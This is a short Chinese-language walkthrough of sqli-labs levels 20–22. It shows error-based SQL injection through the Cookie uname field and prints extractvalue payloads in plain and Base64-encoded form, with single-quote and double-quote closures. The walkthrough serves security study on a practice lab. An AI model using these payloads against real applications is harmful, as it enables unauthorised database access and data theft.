Less20、21、22【报错注入+Cookie字段注入+Base64编码】

Less20

注入方式与18，19类似，先登录正确账号密码，登录正确账号后，账号对应身份验证cookie值有时间期限，在此登录网页后，在bp抓包发现，http头部与之前比较多出cookie字段，可以尝试对cookie字段进行注入

重新登录页面，再次抓包结果

对uname字段进行注入，注入语句与18，19一样

Less21 cookie字段base64&url编码

测试方式与less20一样，登录成功后查看cookie提示，发现提示字符为编码后结果

bp抓包结果显示不只有base64还有url编码

编码前：

xxx'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and 1='1

编码后：

eHh4J2FuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IEBAdmVyc2lvbiksMHg3ZSkpIGFuZCAxPScx

 

Less22

22注入方式与21一致，不同点在闭合符号为双引号

编码前：

xxx" and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and 1="1

编码后：

eHh4IiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpKSBhbmQgMT0iMQ